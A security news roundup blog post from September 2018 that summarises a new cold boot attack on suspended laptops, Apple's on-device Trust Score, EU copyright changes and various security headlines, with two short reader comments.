Security Bits Logo

Security Bits – Cold Boot Attack, Apple’s Anti-Fraud Trust Score, EU Copyright Act Amendments

Security Bits – 21 Sep 2018

Followups

  • Following on from Apple’s belated removal of Adware Doctor for steal users browser history, Apple have now booted three apps from TrendMicro for doing the same, specifically Dr. Cleaner, Dr. Antivirus, and Dr. Archiver. TrendMicro insist it was an innocent mistake due to code re-use, and not malicious or nefarious in any way — tidbits.com/… & arstechnica.com/…
  • Following on from the two big recent UK hacks (Ticket Master & British Airways), the same criminal gang have struck again, this time breaching all credit card transactions on NewEgg for a month — www.macobserver.com/…

Security Medium 1 — A New Cold Boot Attack Against Almost All Laptops

Security researchers have discovered a new variant of the old so-called cold boot attack that affects most laptops. The attack exploits a flaw in how motherboards deal with reboots from devices that are asleep. Or, to be more specific, devices that are in the shallowest of the two sleep states, i.e. devices that are suspended. Devices that are in the deeper hibernation level of sleep are not vulnerable.

If an attacker can get physical access to a laptop that’s currently suspended they can force it to reboot into a special OS of their devising that prevents RAM being scrubbed on reboot, and then uses almost no memory itself, preserving the data from the previously running OS in memory, including the decryption key for full disk encryption. With that key the attacker can then decrypt the disk and help themselves to all the data on the disk.

There are two obvious silver linings, firstly, an attacker needs to physical access to the targeted device while it is in the less deep of the two sleep modes, and they need that access for some time. Secondly, this is not like some previous FireWire-based attacks that could steal memory in seconds simply by plugging a dongle into a laptop for a few seconds and then removing it. You’ve not going to be able to execute this attack while the victim turns their back for a few seconds to get something form a shelf!

The simplest way to protect yourself is not to let your laptop out of your sight while it’s suspended. OS vendors are working on work-arounds, but that may not be so straightforward since the problem is with the very design of the power management APIs used by motherboards.

Links

Security Medium 2 — Apple’s Trust Score Anti-Fraud Feature

Apple updated it’s privacy statement for iOS 12 to inform users that it now calculates something it calls a Trust Score to help battle fraud on their stores. This score is a single number that is calculated on-device, and then sent to Apple’s servers where it is kept for a limited amount of time.

Apple do not detail the exact algorithm they use to generate this score. There’s a very good reason for that, if they did then bad guys could easily fake ‘good’ behaviour and utterly defeat the whole purpose of the feature. While they don’t tell us everything that goes into the algorithm, let alone how all that information does get translated into the final score, they do tell us that the data used includes information about calls and emails. Apple stress that all calculation is done on-device, and only the final numeric score is ever sent to Apple. That score cannot be reverse-engineered to reveal call or email information, and is only kept for a short time.

This seems eminently sensible to me, and it seems to me that Apple have done this right — do it on the device, and only upload the final answer to the cloud. I think it’s significant that Apple were completely up-front about this, and laid out what they are trying to achieve, and what data they are using. We know about this because Apple told us, not because someone caught them doing something in secret, and I think that matters a lot in how I feel about it.

Links

Notable Security Updates

Notable News

  • 🇺🇸 It is now free to freeze and un-freeze your credit file in all states in the US — krebsonsecurity.com/…
  • 🇪🇺 The EU Parliament has approved a somewhat amended version of the controversial new EU-wide copyright act. At issue are articles 11 and 13 which require a so-called link tax, and upload filterswww.theverge.com/…
  • 🇺🇸 New US defence policies allow the US military to defend forward and launch pre-emptive cyber attacks. (Editorial by Bart This is some impressive, in all the wrong ways, Orwellian newspeak!) — nakedsecurity.sophos.com/…
  • Security researchers are warning of a subtle URL re-writing bug in Safari. TL;DR – don’t enter any information into a page of the loading bar has not completed, or if there is no padlock — nakedsecurity.sophos.com/…
  • Unrelated to the above bug, another Safari bug has been found that allows some maliciously crafted HTML+CSS to crash iPhones & Macs — www.macobserver.com/…
  • Google has added a built-in password generator and manager to Chrome — nakedsecurity.sophos.com/…
  • Belgian security researchers have found a significant vulnerability in Tesla Key-fobs — nakedsecurity.sophos.com/…
  • 🇺🇸 Four major US cell carriers (AT&T, Verizon, T-Mobile & Sprint) have gotten together and announced their plans to build an online identity system which they are calling Project Verify. Users will be able to use project verify either as an alternative to passwords, or as a second factor, on sites that choose to implement the technology — krebsonsecurity.com/… & nakedsecurity.sophos.com/…
  • 🇺🇸 The CA state senate has passed a bill which makes a start at regulating the security of IoT devices. The bill is now awaiting the governor’s signature or veto — nakedsecurity.sophos.com/…
  • Owners of WesternDigital MyCloud NAS drives beware, security researcher reveal that the company has failed to patch a serious vulnerability in these drives for over a year — nakedsecurity.sophos.com/…

Suggested Reading

2 thoughts on “Security Bits – Cold Boot Attack, Apple’s Anti-Fraud Trust Score, EU Copyright Act Amendments

  1. Tim McCoy - September 24, 2018

    You never told that last joke/cartoon.

  2. Allison Sheridan - September 24, 2018

    Yeah – it wasn’t that funny…

Leave a Reply

Your email address will not be published.

Scroll to top